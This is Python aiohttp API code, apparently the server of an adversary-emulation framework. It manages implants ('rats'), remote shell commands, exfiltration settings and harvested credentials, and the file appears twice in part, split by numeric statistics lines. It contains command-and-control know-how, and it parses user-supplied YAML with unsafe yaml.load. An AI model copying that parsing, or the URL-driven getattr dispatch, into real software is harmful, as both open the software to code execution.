await request.json() json['artifactlists'] = [Artifactlist.objects.with_id(x) for x in json['artifactlists']] json['steps'] = [CodedStep.objects.with_id(x) for x in json['steps']] adversary.update(**json) return adversary.id elif request.method == 'DELETE': if not adversary.protected: return adversary.delete() @api('/api/step', methods=['GET'], auth_group=['human']) async def query_step(request): return CodedStep.objects @api('/api/site_user', methods=['GET', 'POST'], auth_group=['admin']) async def query_siteusers(request): if request.method == 'GET': return SiteUser.objects.only('username', 'groups', 'email', 'last_login') elif request.method == 'POST': json = await request.json() username = json['username'] email = json.get('email', '') password = json.get('password', None) groups = ['human'] if json.get('admin', False): groups.append('admin') return auth.register_user(username, groups, password=password, email=email).id @api('/api/site_user/{user}', methods=['GET', 'DELETE'], objects={'user': SiteUser}, auth_group=['admin']) async def query_siteuser(request, token, user): if request.method == 'GET': return user.only('username', 'groups', 'email', 'last_login') elif request.method == 'DELETE': if token.session_info['_id'] != str(user.id): return user.delete() @api('/api/site_user/{user}/admin', methods=['PUT', 'DELETE'], objects={'user': SiteUser}, auth_group=['admin']) async def query_siteuser_admin(request, token, user): if request.method == 'PUT': user.modify(push__groups='admin') elif request.method == 'DELETE': if SiteUser.objects(groups='admin').count() > 1 and token.session_info['_id'] != str(user.id): user.modify(pull__groups='admin') @api('/api/site_user/{user}/password', methods=['POST'], objects={'user': SiteUser}, auth_group=['admin', 'human']) async def query_siteuser_password(request, token, user): json = await request.json() if 'password' in json: if token.in_group('admin') or token.session_info['_id'] == str(user.id): auth.user_change_password(user, json['password']) @api('/api/site_user/{user}/email', methods=['POST'], objects={'user': SiteUser}, auth_group=['admin']) async def query_siteuser_email(request, user): json = await request.json() if 'email' in json: user.update(email=json['email']) @api('/api/save_file', methods=['POST'], auth_group=['admin']) async def save_file(request): json = await request.json() if 'edited' in json and 'file' in json: file_path = util.get_path(json['file']) if json['file'].startswith("[-d-]") or file_path is None: return core = util.encrypt_file(json['edited']) with open(file_path, 'wb') as handle: core.tofile(handle) @api('/api/list_file', methods=['GET'], auth_group=['admin']) async def list_files(request): return util.list_files() @api('/api/load_file', methods=['POST'], auth_group=['admin']) async def load_file(request): json = await request.json() if 'file' in json: file_path = util.get_path(json['file']) if json['file'].startswith("[-d-]") or json['file'] == '' or file_path is None: return if file_path.startswith('[m]'): return file_path with open(file_path, 'rb') as handle: data = handle.read() return util.decrypt_file(data) @api('/api/load_psexec', methods=['GET'], auth_group=['admin']) async def load_psexec(request): extern.load_psexec() Setting.objects.first().update(last_psexec_update=util.tz_utcnow()) @api('/api/load_attack', methods=['GET'], auth_group=['admin']) async def load_attack(request): attack.refresh_attack() Setting.objects.first().update(last_attack_update=util.tz_utcnow()) @api('/api/update_depth', methods=['POST'], auth_group=['admin']) async def update_recursion_limit(request): json = await request.json() if 'new_value' in json: Setting.objects.first().modify(recursion_limit=json['new_value']) @api('/api/group_mimic', methods=['GET'], auth_group=['admin', 'human']) async def group_coverage(request): temp_list = [] core = {} for step in CodedStep.objects: for mapping in step.mapping: temp_list.append(mapping.technique) groups = AttackGroup.objects for entry in groups: temp = {} breakdown = {} decision = [] for tech in entry.techniques: temp[tech.name] = (tech in temp_list) decision.append(tech in temp_list) breakdown['techniques'] = temp if (False not in decision) and (len(decision) > 2): breakdown['conclusion'] = 'Can Fully Emulate' else: breakdown['conclusion'] = 'Can Not Fully Emulate' core[entry.name] = breakdown return core @api('/api/steps/{step}/mapping', methods=['POST', 'DELETE'], objects={'step': CodedStep}, auth_group=['human']) async def post_step_mapping(request, step): if request.method == 'POST': json = await request.json() if 'tactics' not in json or 'technique' not in json: return tactics = json['tactics'] technique = json['technique'] try: tech = AttackTechnique.objects.with_id(technique) for tactic in tactics: tac = AttackTactic.objects.with_id(tactic) step.modify(push__mapping=TechniqueMapping(technique=tech, tactic=tac)) except (TypeError, mongoengine.errors.ValidationError): return elif request.method == 'DELETE': json = await request.json() if 'tactic' not in json or 'technique' not in json: return tactic = json['tactic'] technique = json['technique'] try: tech = AttackTechnique.objects.with_id(technique) tac = AttackTactic.objects.with_id(tactic) for mapping in step.mapping: if mapping.tactic == tac and mapping.technique == tech: step.modify(pull__mapping=mapping) except (TypeError, mongoengine.errors.ValidationError): return @api('/api/steps/{step}/mapping/load_defaults', methods=['GET'], objects={'step': CodedStep}, auth_group=['human']) async def get_step_mapping_defaults(request, step): step.update(mapping=step.default_mapping) @api('/api/attack_download.json', methods=['GET'], auth_group=['human'], headers={'Content-Disposition': 'attachment'}) async def get_all_attack_stuff(request): try: techniques = [] for technique in AttackTechnique.objects: this_technique = technique.to_dict() this_technique['tactics'] = [x.name for x in technique.tactics] del this_technique['_id'] techniques.append(this_technique) tactics = [x.to_dict() for x in AttackTactic.objects] for tactic in tactics: del tactic["_id"] return {"techniques": techniques, "tactics": tactics} except (TypeError, mongoengine.errors.ValidationError): return @api('/api/generated/{function}', methods=["POST"], auth_group=['admin']) async def generated_dispatcher(request): dispatched_function = request.match_info['function'] request_json = await request.json() job = getattr(interface, dispatched_function)(**request_json) try: await job.wait_till_completed() return job.action['result'] except JobException: return job.action['error'] @api('/api/artifactlists', methods=['GET', 'POST'], auth_group=['human']) async def get_artifactlists(request): if request.method == 'GET': return Artifactlist.objects elif request.method == 'POST': if request.content_type == "application/json": content = await request.json() elif request.content_type == "text/x-yaml": try: content = format_yaml(await request.text()) except (yaml.scanner.ScannerError, yaml.parser.ParserError): return web.Response(status=400, text="The yaml was not properly formatted") else: return web.Response(status=400) try: return Artifactlist(**content).save().id except (mongoengine.errors.FieldDoesNotExist, mongoengine.errors.ValidationError) as e: return web.Response(status=400, text=str(e)) @api('/api/artifactlists/{artifactlist}', methods=['GET', 'PUT', 'DELETE'], objects={'artifactlist': Artifactlist}, auth_group=['human']) async def query_artifactlist(request, artifactlist): if request.method == 'GET': return artifactlist elif request.method == 'PUT': if request.content_type == "application/json": content = await request.json() elif request.content_type == "text/x-yaml": try: content = format_yaml(await request.text()) except (yaml.scanner.ScannerError, yaml.parser.ParserError): return web.Response(status=400, text="The yaml was not properly formatted") else: return web.Response(status=400) try: artifactlist.update(**content) return artifactlist.id except (mongoengine.errors.FieldDoesNotExist, mongoengine.errors.ValidationError) as e: return web.Response(status=400, text=str(e)) elif request.method == 'DELETE': return artifactlist.delete() @api('/api/parse_artifactlist', methods=['POST'], auth_group=['human']) async def get_parse_artifactlist(request): try: parsed = format_yaml(await request.text()) Artifactlist(**parsed) return parsed except (yaml.scanner.ScannerError, yaml.parser.ParserError) as e: return web.Response(status=400, text="The yaml was not properly formatted: \n" + str(e.problem_mark) + '\n ' + str(e.problem)) except (mongoengine.errors.FieldDoesNotExist, mongoengine.errors.ValidationError) as e: return web.Response(status=400, text=str(e)) def format_yaml(yaml_content): parsed = yaml.load(yaml_content) cleaned = {} for k, v in parsed.items(): if isinstance(v, list) and len(v) == 1 and v[0] is None: cleaned[k] = [] else: cleaned[k] = v return cleaned @api('/api/bsf/{log}', methods=['GET'], objects={'log': Log}, auth_group=['human'], headers={'Content-Disposition': 'attachment; filename=\"bsf.json\"'}) async def query_bsf(request, log): return log["event_stream"] @api('/api/observed/credentials', methods=['GET'], auth_group=['human']) async def query_credentials(request): return ObservedCredential.objects @api('/api/observed/credentials/{credential}', methods=['GET'], objects={'credential': ObservedCredential}, auth_group=['human']) async def query_credential(request, token, credential): return credential @api('/api/observed/users', methods=['GET'], auth_group=['human']) async def query_users(request): return ObservedUser.objects @api('/api/observed/users/{user}', methods=['GET'], objects={'user': ObservedUser}, auth_group=['human']) async def query_user(request, token, user): return user @api('/api/observed/shares', methods=['GET'], auth_group=['human']) async def query_shares(request): return ObservedShare.objects @api('/api/observed/shares/{share}', methods=['GET'], objects={'share': ObservedShare}, auth_group=['human']) async def query_share(request, token, share): return share @api('/api/observed/files', methods=['GET'], auth_group=['human']) async def query_files(request): return ObservedFile.objects @api('/api/observed/files/{file}', methods=['GET'], objects={'file': ObservedFile}, auth_group=['human']) async def query_file(request, token, file): return file @api('/api/observed/domains', methods=['GET'], auth_group=['human']) async def query_domains(request): return ObservedDomain.objects @api('/api/observed/domains/{domain}', methods=['GET'], objects={'domain': ObservedDomain}, auth_group=['human']) async def query_domain(request, token, domain): return domain @api('/api/observed/os_versions', methods=['GET'], auth_group=['human']) async def query_os_versions(request): return ObservedOsversion.objects @api('/api/observed/os_versions/{os_version}', methods=['GET'], objects={'os_version': ObservedOSVersion}, auth_group=['human']) async def query_os_version(request, token, os_version): return os_version @api('/api/observed/hosts', methods=['GET'], auth_group=['human']) async def query_hosts(request): return ObservedHost.objects @api('/api/observed/hosts/{host}', methods=['GET'], objects={'host': ObservedHost}, auth_group=['human']) async def query_host(request, token, host): return host @api('/api/observed/schtasks', methods=['GET'], auth_group=['human']) async def query_schtasks(request): return ObservedSchtask.objects @api('/api/observed/schtasks/{schtask}', methods=['GET'], objects={'schtask': ObservedSchtask}, auth_group=['human']) async def query_schtask(request, token, schtask): return schtask @api('/api/observed/services', methods=['GET'], auth_group=['human']) async def query_timedeltas(request): return ObservedService.objects @api('/api/observed/services/{service}', methods=['GET'], objects={'service': ObservedService}, auth_group=['human']) async def query_timedelta(request, token, service): return service @api('/api/observed/timedeltas', methods=['GET'], auth_group=['human']) async def query_timedeltas(request): return ObservedTimeDelta.objects @api('/api/observed/timedeltas/{timedelta}', methods=['GET'], objects={'timedelta': ObservedTimeDelta}, auth_group=['human']) async def query_timedelta(request, token, timedelta): return timedelta @api('/api/observed/rats', methods=['GET'], auth_group=['human']) async def query_rats(request): return ObservedRat.objects @api('/api/observed/rats/{rat}', methods=['GET'], objects={'rat': ObservedRat}, auth_group=['human']) async def query_rat(request, token, rat): return rat @api('/api/observed/registry_keys', methods=['GET'], auth_group=['human']) async def query_registry_keys(request): return ObservedRegKey.objects @api('/api/observed/registry_keys/{registry_key}', methods=['GET'], objects={'registry_key': ObservedRegKey}, auth_group=['human']) async def query_regkey(request, token, registry_key): return registry_key @api('/api/observed/persistence', methods=['GET'], auth_group=['human']) async def query_persistence_all(request): return ObservedPersistence.objects @api('/api/observed/persistence/{persistence}', methods=['GET'], objects={'persistence': ObservedPersistence}, auth_group=['human']) async def query_persistence(request, token, persistence): return persistence @api('/api/observed/processes', methods=['GET'], auth_group=['human']) async def query_processes(request): return ObservedProcess.objects @api('/api/observed/processes/{process}', methods=['GET'], objects={'process': ObservedProcess}, auth_group=['human']) async def query_process(request, token, process): return process @api('/api/step', methods=['GET'], auth_group=['human']) async def query_step(request): return CodedStep.objects @websocket('/websocket', auth_group=["human"]) async def wb_operation(request): ws = web.WebSocketResponse() await ws.prepare(request) def write_websocket(data): if not ws.closed: ws.send_bytes(data) else: raise RuntimeError srv = ddp.DDPServer(write_websocket) srv.register_collection("operation", Operation) srv.register_collection("domain", Domain) srv.register_collection("host", Host) srv.register_collection("network", Network) srv.register_collection("rat", Rat) srv.register_collection("observed_rat", ObservedRat) srv.register_collection("observed_host", ObservedHost) srv.register_collection("observed_file", ObservedFile) srv.register_collection("observed_schtask", ObservedSchtask) srv.register_collection("job", Job) srv.register_collection("log", Log) srv.register_collection("adversary", Adversary) srv.register_collection("step", CodedStep) srv.register_collection("active_connection", ActiveConnection) srv.register_collection("agent", Agent) srv.register_collection("attack_technique", AttackTechnique) srv.register_collection("attack_tactic", AttackTactic) srv.register_collection("attack_list", AttackList) srv.register_collection("attack_group", AttackGroup) srv.register_collection("setting", Setting) srv.register_collection("artifactlist", Artifactlist) request.app['websockets'].append(ws) try: async for msg in ws: if msg.type == aiohttp.WSMsgType.TEXT or msg.type == aiohttp.WSMsgType.BINARY: srv.parse_message(msg.data) elif msg.type == aiohttp.WSMsgType.ERROR: log.debug('ws connection closed with exception {}'.format(ws.exception())) finally: request.app['websockets'].remove(ws) log.debug('websocket connection closed') return ws def init(app): # setup the generated endpoints for method, uri, func in routes: app.router.add_route(method, uri, func)
37.889788
137
0.621221
import asyncio from datetime import datetime, timezone from functools import wraps import traceback import inspect import logging import ujson as json_module import hashlib import yaml from aiohttp import web import aiohttp import mongoengine import os from .engine.objects import Operation, Network, Domain, Log, ObservedHost, TechniqueMapping, Job, Rat, Host, \ ObservedRat, Adversary, CodedStep, ActiveConnection, Agent, AttackTechnique, AttackTactic, SiteUser, Setting, \ Opcodes, Artifactlist, ObservedFile, AttackList, JobException, ObservedSchtask, ObservedProcess, AttackGroup from .engine.objects import ObservedDomain, ObservedOSVersion, ObservedUser, ObservedShare, ObservedCredential, \ ObservedService, ObservedTimeDelta, ObservedRegKey, ObservedPersistence from . import authentication as auth from .engine.database import native_types from . import ddp from . import attack from . import util from . import interface from . import extern log = logging.getLogger(__name__) routes = [] def api(uri, methods, objects=None, get=None, auth_group=None, headers=None): if objects is None: objects = {} if get is None: get = {} if auth_group is None: auth_group = [] if headers is None: headers = {} def decorator(f): @wraps(f) async def decorated(req, token, url_match): kwargs = {} for name, _class in objects.items(): if name in url_match: try: kwargs[name] = _class.objects.with_id(url_match[name]) if kwargs[name] is None: return web.HTTPBadRequest() except (mongoengine.errors.ValidationError, ): return web.HTTPBadRequest() trueified = {k: True if v == '' else v for k, v in req.GET.items()} for k, v in get.items(): kwargs[k] = trueified.get(k, v) sig = inspect.signature(f) if 'token' in sig.parameters: kwargs['token'] = token results = await f(req, **kwargs) if isinstance(results, web.StreamResponse): return results else: json = json_module.dumps(native_types(results), sort_keys=True, indent=4) return web.Response(text=json, content_type='application/json', headers=headers) async def entrypoint(req): host = None try: token = auth.Token(req.cookies.get('AUTH')) l = [g for g in auth_group if token.in_group(g)] if len(l) == 0: raise auth.NotAuthorized() peername = req.transport.get_extra_info('peername') if peername is not None: host_ip, port = peername if req.host: local_ip = req.host.split(":")[0] if local_ip == "localhost": local_ip = "127.0.0.1" else: local_ip = "127.0.0.1" token_host = None if token.in_group('agent'): agent = Agent.objects.with_id(token.session_info['_id']) if agent is None: raise auth.NotAuthorized agent.modify(**{'alive': True}) token_host = agent.host host = ActiveConnection.objects(ip=host_ip, host=token_host, local_ip=local_ip).first() if host is None: host = ActiveConnection(ip=host_ip, host=token_host, local_ip=local_ip, connections=0).save() host.update(inc__connections=1) resp = await decorated(req, token, req.match_info) return resp except auth.NotAuthorized: return web.HTTPForbidden() except Exception: traceback.print_exc() results = {'error': 'exception in ' + f.__name__} output = json_module.dumps(results, sort_keys=True, indent=4) return web.HTTPInternalServerError(text=output, content_type='application/json') finally: if host: host.update(dec__connections=1) for method in methods: routes.append((method, uri, entrypoint)) return decorated return decorator def websocket(uri, auth_group=None): if auth_group is None: auth_group = [] def decorator(f): @wraps(f) async def entrypoint(req): try: token = auth.Token(req.cookies.get('AUTH')) l = [g for g in auth_group if token.in_group(g)] if len(l) == 0: raise auth.NotAuthorized() return await f(req) except auth.NotAuthorized: return web.HTTPForbidden() except Exception: traceback.print_exc() results = {'error': 'exception in ' + f.__name__} output = json_module.dumps(results, sort_keys=True, indent=4) return web.HTTPInternalServerError(text=output, content_type='application/json') routes.append(('GET', uri, entrypoint)) return entrypoint return decorator @api('/api/jobs', methods=['GET', 'POST'], get={'status': None, 'wait': False}, auth_group=['human', 'agent']) async def query_jobs(request, token, status, wait): if request.method == 'GET': query = {} if status: query['status'] = status if token.in_group('agent'): agent = Agent.objects.with_id(token.session_info['_id']) if not agent: raise auth.NotAuthorized() query.update({'agent': agent.id}) jobs = list(Job.objects(**query)) if not len(jobs) and wait is not False: try: jobs = [(await Job.wait_next(query))] except asyncio.CancelledError: return else: jobs = list(Job.objects(**query)) if not len(jobs) and wait is not False: jobs = [(await Job.wait_next(query))] return jobs elif request.method == 'POST': token.require_group('human') json = await request.json() return Job(**json).save().id @api('/api/jobs/{job}', methods=['GET', 'PUT', 'DELETE'], objects={'job': Job}, auth_group=['human', 'agent']) async def query_job(request, token, job): if request.method == 'GET': if token.in_group('agent'): if job['status'] in ("created", "pending") and str(job.agent.id) == token.session_info['_id']: return job else: raise auth.NotAuthorized() else: return job elif request.method == 'PUT': if token.in_group('agent'): if job.status in ("created", "pending") and str(job.agent.id) == token.session_info['_id']: json = await request.json() if 'result' in json['action']: job['action']['result'] = json['action']['result'] if 'error' in json['action']: job['action']['error'] = json['action']['error'] if 'exception' in json['action']: job['action']['exception'] = json['action']['exception'] job['status'] = json.get('status', job.status) if job['status'] == "failed" and 'error' in job['action'] and job['action']['error'] == "no client": interface.get_clients(job.agent.host) try: iv_name = job['action']["rats"]["args"][0] iv = Rat.objects(agent=job.agent, name=iv_name) iv.modify(**{'active': False}) except KeyError: log.warning("Could not find rat to remove for failed job") return job.save() else: raise auth.NotAuthorized() else: json = await request.json() if json['create_time']: json['create_time'] = datetime.strptime(json['create_time'], "%Y-%m-%dT%H:%M:%S.%f") return job.save() elif request.method == 'DELETE': token.require_group('human') return job.delete() @api('/api/clients', methods=['POST'], auth_group=['agent']) async def query_clients(request, token): json = await request.json() agen = Agent.objects.with_id(token.session_info['_id']) complete_names = {iv.name: iv for iv in Rat.objects(host=agen.host)} known_names = {} for name, element in complete_names.items(): if element.active: known_names[name] = element active = {x['pid']: x for x in json} for name, iv in known_names.items(): if name not in active: iv.modify(**{'active': False}) else: a = active.pop(name) iv.update(**{'elevated': a['elevated'], 'executable': a['executable_path']}) for name in active: Rat(**{'agent': agen, 'host': agen.host, 'name': name, 'elevated': active[name]['elevated'], 'executable': active[name]['executable_path'], 'username': active[name]['username'].lower(), 'active': True}).save() return None @api('/api/networks', methods=['GET', 'POST'], auth_group=['human']) async def query_networks(request): if request.method == 'GET': return Network.objects elif request.method == 'POST': json = await request.json() network = Network(**json).save() return network.id @api('/api/networks/{network}', methods=['GET', 'DELETE'], objects={'network': Network}, auth_group=['human']) async def query_network(request, network): if request.method == 'GET': return network elif request.method == 'DELETE': network.delete() @api('/api/heartbeat', methods=['GET'], auth_group=['agent']) async def agent_check_in(request, token): agen = Agent.objects.with_id(token.session_info['_id']) agen.modify(**{'check_in': datetime.now(timezone.utc), 'alive': True}) return True @api('/api/hosts', methods=['GET'], auth_group=['human']) async def query_hosts(request): return Host.objects @api('/api/domains', methods=['GET'], auth_group=['human']) async def query_domains(request): return Domain.objects @api('/api/domains/{domain}', methods=['GET'], objects={'domain': Domain}, auth_group=['human']) async def query_domain(request, domain): return domain @api('/api/domains/{domain}/hosts', methods=['GET'], objects={'domain': Domain}, auth_group=['human']) async def query_domainhosts(request, domain): return Host.objects(domain=domain) @api('/api/networks/{network}/hosts', methods=['GET'], objects={'network': Network}, auth_group=['human']) async def query_networkhosts(request, network): return network.hosts @api('/api/networks/{network}/hosts/{host}', methods=['GET', 'PUT', 'DELETE'], objects={'network': Network, 'host': Host}, auth_group=['human']) async def query_networkhosthosts(request, network, host): if request.method == 'GET': return host elif request.method == 'PUT': network.modify(push__hosts=host) elif request.method == 'DELETE': network.modify(pull__hosts=host) @api('/api/hosts/{host}/commands', methods=['GET', 'POST'], objects={'host': Host}, auth_group=['human']) async def query_commands(request, host): if request.method == 'GET': if 'hostname' in request.GET: hosts = Host.objects(hostname=request.GET['hostname']) return [x.host_command_result() for x in Job.objects(host__in=hosts)] else: return [x.host_command_result() for x in Job.objects(host=host)] elif request.method == 'POST': json = await request.json() return interface.agent_shell_command(host, json['command_line']).id @api('/api/hosts/{host}/commands/{job}', methods=['GET'], get={'wait': False}, objects={'host': Host, 'job': Job}, auth_group=['human']) async def query_command(request, wait, host, job): if wait is not False: try: await job.wait_till_completed() except JobException as e: log.warning(e.args) return job.host_command_result() @api('/api/rats', methods=['GET'], auth_group=['human']) async def query_ivs(request): query = {k: v for k, v in request.GET.items() if k == 'hostname'} return Rat.objects(**query) @api('/api/rats/{rat}', methods=['GET'], objects={'rat': Rat}, auth_group=['human']) async def query_iv(rat): return rat @api('/api/rats/{rat}/commands', methods=['GET', 'POST'], objects={'rat': Rat}, auth_group=['human']) async def query_ivcommands(request, rat): if request.method == 'GET': return [x.rat_command_result() for x in Job.objects(agent=rat.agent)] elif request.method == 'POST': json = await request.json() return Job.create_rat_command(rat, json["function"], **json["parameters"]).id @api('/api/rats/{rat}/commands/{job}', methods=['GET'], get={'wait': False}, objects={'rat': Rat, 'job': Job}, auth_group=['human']) async def query_ivcommand(request, wait, rat, job): if wait is not False: try: await job.wait_till_completed() except JobException as e: log.warning(e.args) return job.rat_result() @api('/api/operations', methods=['GET'], auth_group=['human']) async def query_operations(request): return Operation.objects @api('/api/opcodes', methods=['GET'], auth_group=['human']) async def get_opcodes(request): return Opcodes.arguments @api('/api/networks/{network}/operations', methods=['GET', 'POST'], objects={'network': Network}, auth_group=['human']) async def query_perations(request, network): if request.method == 'GET': return list(Operation.objects(network=network)) elif request.method == 'POST': json = await request.json() if json['start_type'] == 'existing' and 'start_rat' not in json: return None json['network'] = network json['status'] = 'start' json['status_state'] = '' json['log'] = Log().save() adversary = Adversary.objects.with_id(json['adversary']) json['steps'] = [x.name for x in adversary.steps] operation = Operation(**json).save() return operation.id @api('/api/networks/{network}/operations/{operation}', methods=['GET', 'PUT', 'DELETE', 'PATCH'], get={'wait': False}, objects={'network': Network, 'operation': Operation}, auth_group=['human']) async def query_operation(request, network, operation, wait): if request.method == 'GET': if wait: wait = json_module.loads(wait) wait["id"] = operation.id log.info("Wait: {}".format(wait)) new = list(Operation.objects(**wait)) if len(new) == 0: del wait["id"] new = [await operation.wait(wait)] return new[0] return operation elif request.method == 'PUT': json = await request.json() json['network_id'] = network.id json['hosts'] = network.hosts return operation.update(**json) elif request.method == 'DELETE': return operation.delete() elif request.method == 'PATCH': json = await request.json() operation.update(__raw__={'$set': json}) @api('/api/agents', methods=['GET'], auth_group=['human']) async def query_agents(request): return Agent.objects @api('/api/logs', methods=['GET'], auth_group=['human']) async def query_logs(request): return Log.objects @api('/api/logs/{log}', methods=['GET'], objects={'log': Log}, auth_group=['human']) async def query_log(request, log): return log @api('/api/agents/{agent}', methods=['GET'], objects={'agent': Agent}, auth_group=['human']) async def query_agent(request, agent): return agent @api('/api/adversaries', methods=['GET', 'POST'], auth_group=['human']) async def query_adversaries(request): if request.method == 'GET': return Adversary.objects elif request.method == 'POST': json = await request.json() json['artifactlists'] = [Artifactlist.objects.with_id(x) for x in json['artifactlists']] json['steps'] = [CodedStep.objects.with_id(x) for x in json['steps']] return Adversary(**json).save().id @api('/api/adversaries/{adversary}', methods=['GET', 'PUT', 'DELETE'], objects={'adversary': Adversary}, auth_group=['human']) async def query_adversary(request, adversary): if request.method == 'GET': return adversary elif request.method == 'PUT': if (adversary.protected): new_adv = {} new_adv['name'] = adversary['name'] new_adv['steps'] = adversary['steps'] new_adv['exfil_method'] = adversary['exfil_method'] new_adv['exfil_port'] = adversary['exfil_port'] new_adv['exfil_address'] = adversary['exfil_address'] new_adv['artifactlists'] = adversary['artifactlists'] adversary = Adversary(**new_adv).save() json = await request.json() json['artifactlists'] = [Artifactlist.objects.with_id(x) for x in json['artifactlists']] json['steps'] = [CodedStep.objects.with_id(x) for x in json['steps']] adversary.update(**json) return adversary.id elif request.method == 'DELETE': if not adversary.protected: return adversary.delete() @api('/api/step', methods=['GET'], auth_group=['human']) async def query_step(request): return CodedStep.objects @api('/api/site_user', methods=['GET', 'POST'], auth_group=['admin']) async def query_siteusers(request): if request.method == 'GET': return SiteUser.objects.only('username', 'groups', 'email', 'last_login') elif request.method == 'POST': json = await request.json() username = json['username'] email = json.get('email', '') password = json.get('password', None) groups = ['human'] if json.get('admin', False): groups.append('admin') return auth.register_user(username, groups, password=password, email=email).id @api('/api/site_user/{user}', methods=['GET', 'DELETE'], objects={'user': SiteUser}, auth_group=['admin']) async def query_siteuser(request, token, user): if request.method == 'GET': return user.only('username', 'groups', 'email', 'last_login') elif request.method == 'DELETE': if token.session_info['_id'] != str(user.id): return user.delete() @api('/api/site_user/{user}/admin', methods=['PUT', 'DELETE'], objects={'user': SiteUser}, auth_group=['admin']) async def query_siteuser_admin(request, token, user): if request.method == 'PUT': user.modify(push__groups='admin') elif request.method == 'DELETE': if SiteUser.objects(groups='admin').count() > 1 and token.session_info['_id'] != str(user.id): user.modify(pull__groups='admin') @api('/api/site_user/{user}/password', methods=['POST'], objects={'user': SiteUser}, auth_group=['admin', 'human']) async def query_siteuser_password(request, token, user): json = await request.json() if 'password' in json: if token.in_group('admin') or token.session_info['_id'] == str(user.id): auth.user_change_password(user, json['password']) @api('/api/site_user/{user}/email', methods=['POST'], objects={'user': SiteUser}, auth_group=['admin']) async def query_siteuser_email(request, user): json = await request.json() if 'email' in json: user.update(email=json['email']) @api('/api/save_file', methods=['POST'], auth_group=['admin']) async def save_file(request): json = await request.json() if 'edited' in json and 'file' in json: file_path = util.get_path(json['file']) if json['file'].startswith("[-d-]") or file_path is None: return core = util.encrypt_file(json['edited']) with open(file_path, 'wb') as handle: core.tofile(handle) @api('/api/list_file', methods=['GET'], auth_group=['admin']) async def list_files(request): return util.list_files() @api('/api/load_file', methods=['POST'], auth_group=['admin']) async def load_file(request): json = await request.json() if 'file' in json: file_path = util.get_path(json['file']) if json['file'].startswith("[-d-]") or json['file'] == '' or file_path is None: return if file_path.startswith('[m]'): return file_path with open(file_path, 'rb') as handle: data = handle.read() return util.decrypt_file(data) @api('/api/load_psexec', methods=['GET'], auth_group=['admin']) async def load_psexec(request): extern.load_psexec() Setting.objects.first().update(last_psexec_update=util.tz_utcnow()) @api('/api/load_attack', methods=['GET'], auth_group=['admin']) async def load_attack(request): attack.refresh_attack() Setting.objects.first().update(last_attack_update=util.tz_utcnow()) @api('/api/update_depth', methods=['POST'], auth_group=['admin']) async def update_recursion_limit(request): json = await request.json() if 'new_value' in json: Setting.objects.first().modify(recursion_limit=json['new_value']) @api('/api/group_mimic', methods=['GET'], auth_group=['admin', 'human']) async def group_coverage(request): temp_list = [] core = {} for step in CodedStep.objects: for mapping in step.mapping: temp_list.append(mapping.technique) groups = AttackGroup.objects for entry in groups: temp = {} breakdown = {} decision = [] for tech in entry.techniques: temp[tech.name] = (tech in temp_list) decision.append(tech in temp_list) breakdown['techniques'] = temp if (False not in decision) and (len(decision) > 2): breakdown['conclusion'] = 'Can Fully Emulate' else: breakdown['conclusion'] = 'Can Not Fully Emulate' core[entry.name] = breakdown return core @api('/api/steps/{step}/mapping', methods=['POST', 'DELETE'], objects={'step': CodedStep}, auth_group=['human']) async def post_step_mapping(request, step): if request.method == 'POST': json = await request.json() if 'tactics' not in json or 'technique' not in json: return tactics = json['tactics'] technique = json['technique'] try: tech = AttackTechnique.objects.with_id(technique) for tactic in tactics: tac = AttackTactic.objects.with_id(tactic) step.modify(push__mapping=TechniqueMapping(technique=tech, tactic=tac)) except (TypeError, mongoengine.errors.ValidationError): return elif request.method == 'DELETE': json = await request.json() if 'tactic' not in json or 'technique' not in json: return tactic = json['tactic'] technique = json['technique'] try: tech = AttackTechnique.objects.with_id(technique) tac = AttackTactic.objects.with_id(tactic) for mapping in step.mapping: if mapping.tactic == tac and mapping.technique == tech: step.modify(pull__mapping=mapping) except (TypeError, mongoengine.errors.ValidationError): return @api('/api/steps/{step}/mapping/load_defaults', methods=['GET'], objects={'step': CodedStep}, auth_group=['human']) async def get_step_mapping_defaults(request, step): step.update(mapping=step.default_mapping) @api('/api/attack_download.json', methods=['GET'], auth_group=['human'], headers={'Content-Disposition': 'attachment'}) async def get_all_attack_stuff(request): try: techniques = [] for technique in AttackTechnique.objects: this_technique = technique.to_dict() this_technique['tactics'] = [x.name for x in technique.tactics] del this_technique['_id'] techniques.append(this_technique) tactics = [x.to_dict() for x in AttackTactic.objects] for tactic in tactics: del tactic["_id"] return {"techniques": techniques, "tactics": tactics} except (TypeError, mongoengine.errors.ValidationError): return @api('/api/generated/{function}', methods=["POST"], auth_group=['admin']) async def generated_dispatcher(request): dispatched_function = request.match_info['function'] request_json = await request.json() job = getattr(interface, dispatched_function)(**request_json) try: await job.wait_till_completed() return job.action['result'] except JobException: return job.action['error'] @api('/api/artifactlists', methods=['GET', 'POST'], auth_group=['human']) async def get_artifactlists(request): if request.method == 'GET': return Artifactlist.objects elif request.method == 'POST': if request.content_type == "application/json": content = await request.json() elif request.content_type == "text/x-yaml": try: content = format_yaml(await request.text()) except (yaml.scanner.ScannerError, yaml.parser.ParserError): return web.Response(status=400, text="The yaml was not properly formatted") else: return web.Response(status=400) try: return Artifactlist(**content).save().id except (mongoengine.errors.FieldDoesNotExist, mongoengine.errors.ValidationError) as e: return web.Response(status=400, text=str(e)) @api('/api/artifactlists/{artifactlist}', methods=['GET', 'PUT', 'DELETE'], objects={'artifactlist': Artifactlist}, auth_group=['human']) async def query_artifactlist(request, artifactlist): if request.method == 'GET': return artifactlist elif request.method == 'PUT': if request.content_type == "application/json": content = await request.json() elif request.content_type == "text/x-yaml": try: content = format_yaml(await request.text()) except (yaml.scanner.ScannerError, yaml.parser.ParserError): return web.Response(status=400, text="The yaml was not properly formatted") else: return web.Response(status=400) try: artifactlist.update(**content) return artifactlist.id except (mongoengine.errors.FieldDoesNotExist, mongoengine.errors.ValidationError) as e: return web.Response(status=400, text=str(e)) elif request.method == 'DELETE': return artifactlist.delete() @api('/api/parse_artifactlist', methods=['POST'], auth_group=['human']) async def get_parse_artifactlist(request): try: parsed = format_yaml(await request.text()) Artifactlist(**parsed) return parsed except (yaml.scanner.ScannerError, yaml.parser.ParserError) as e: return web.Response(status=400, text="The yaml was not properly formatted: \n" + str(e.problem_mark) + '\n ' + str(e.problem)) except (mongoengine.errors.FieldDoesNotExist, mongoengine.errors.ValidationError) as e: return web.Response(status=400, text=str(e)) def format_yaml(yaml_content): parsed = yaml.load(yaml_content) cleaned = {} for k, v in parsed.items(): if isinstance(v, list) and len(v) == 1 and v[0] is None: cleaned[k] = [] else: cleaned[k] = v return cleaned @api('/api/bsf/{log}', methods=['GET'], objects={'log': Log}, auth_group=['human'], headers={'Content-Disposition': 